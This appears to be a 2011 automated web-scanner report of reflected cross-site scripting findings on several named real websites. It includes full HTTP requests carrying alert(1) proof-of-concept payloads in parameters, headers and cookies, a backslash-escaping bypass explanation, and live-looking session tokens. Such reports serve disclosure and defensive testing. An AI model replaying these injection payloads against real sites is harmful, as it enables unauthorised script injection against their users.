HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 21:48:25 GMT Server: Apache/2.2.3 (Red Hat) Expires: Sun, 7 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache X-UA-Compatible: chrome=1 Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 15273
The value of the siteConfig request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e0f6b%3balert(1)//b7e51f302787001e0 was submitted in the siteConfig parameter. This input was echoed as e0f6b;alert(1)//b7e51f302787001e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7De0f6b%3balert(1)//b7e51f302787001e0&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css&wbxPagePath=&pages=%5B%5D&isInstallable=true&pageIds=%5B%5D&wbxPageTitle=New+App&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1 Host: www.widgetserver.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Origin: http://www.widgetbox.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 21:48:20 GMT Server: Apache/2.2.3 (Red Hat) Expires: Sun, 7 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache X-UA-Compatible: chrome=1 Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 11098
The value of the wbxPageTitle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f3c8"%3balert(1)//c8b66430a224ecbcd was submitted in the wbxPageTitle parameter. This input was echoed as 3f3c8";alert(1)//c8b66430a224ecbcd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7D&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css&wbxPagePath=&pages=%5B%5D&isInstallable=true&pageIds=%5B%5D&wbxPageTitle=New+App3f3c8"%3balert(1)//c8b66430a224ecbcd&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1 Host: www.widgetserver.com Proxy-Connection: keep-alive Cache-Control: max-age=0 Origin: http://www.widgetbox.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 21:48:29 GMT Server: Apache/2.2.3 (Red Hat) Expires: Sun, 7 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache X-UA-Compatible: chrome=1 Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 15150
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e63"-alert(1)-"6ad0caf2cf8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title> ...[SNIP]... ion','ordernumber') : unknown record type null]------&_exc="+exceptionInfo+"-----Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.1659e63"-alert(1)-"6ad0caf2cf8"); } }; </script> ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript rest-of-line comment. The payload f43cc</script><script>alert(1)</script>3f14fd6293f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title> ...[SNIP]... ptlet.nl?script=94&deploy=1&compid=1142057&h=f5940e0c3bb4a600755b&_orderNo=&_exc=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16f43cc</script><script>alert(1)</script>3f14fd6293f"); /* another GA account UA-22755206-1 */ var pageTracker1 = _gat._getTracker("UA-22755206-1"); pageTracker1._setDomainName("none"); pageTracker1._setAllowLinker(true); pageTracker1 ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75715\'%3balert(1)//8dbcb7e0cd9 was submitted in the Referer HTTP header. This input was echoed as 75715\\';alert(1)//8dbcb7e0cd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /iframe/recommendedcvupload.aspx?pagever=NewMSN HTTP/1.1 Host: www.careerbuilder.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=75715\'%3balert(1)//8dbcb7e0cd9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CB%5FSID=66ee7709ffa3453389de6128eeb18875-357143948-w4-6; BID=X1B5CE6DB054A3B8D64198121F94D45E247F1DE3EBA3E204F258F8D2F5D9E98B1FB41E77395140550B900D87EFE23B4943
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" X-Powered-By: ASP.NET X-PBY: REBEL52 Date: Tue, 26 Apr 2011 18:43:23 GMT Connection: close Content-Length: 45799
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Find J ...[SNIP]... .careerbuilder.com/iframe/recommendedcvupload.aspx'; s_cb.server='www'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 75715\\';alert(1)//8dbcb7e0cd9'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the a cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c028f"><script>alert(1)</script>de5d22cc79e was submitted in the a cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the a1 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30897"><script>alert(1)</script>7ab7a776cb7 was submitted in the a1 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload abbaf<script>alert(1)</script>94d12c45380 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 60dd7<script>alert(1)</script>dccd8ad0c81 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 896ae<script>alert(1)</script>4b73efe183f was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload c3e3b<script>alert(1)</script>be3830adad1 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload b9d14<script>alert(1)</script>610a34ff3d4 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload b4cb4<script>alert(1)</script>942e4e48996 was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload d7644<script>alert(1)</script>88902fd901f was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p92429851 cookie is copied into the HTML document as plain text between tags. The payload 6fac2<script>alert(1)</script>42593258a81 was submitted in the ar_p92429851 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 86eb2<script>alert(1)</script>7f5234ca961 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload d9b4a<script>alert(1)</script>cfcd3ff335d was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 4bf4e<script>alert(1)</script>14929ac7093 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?purl=http%3A%2F%2Fwww.computerworlduk.com%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F%3Folo%3Drss&jsref=&rnd=1303854579845 HTTP/1.1 Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CspT702sdV9LL0aNgCmJAg==4bf4e<script>alert(1)</script>14929ac7093; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1
Response
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Tue, 26 Apr 2011 21:51:26 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM" Content-Length: 1368
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc738"-alert(1)-"79350713e7 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... ascript'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwndc738"-alert(1)-"79350713e7"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7942c"-alert(1)-"151728b75d8 was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e120e"-alert(1)-"301dcb340ea34b3b7 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... ascript'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwne120e"-alert(1)-"301dcb340ea34b3b7"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3753"-alert(1)-"1bbca0be6e9 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... ascript'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwne3753"-alert(1)-"1bbca0be6e9"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61497"-alert(1)-"12b550c25c9 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
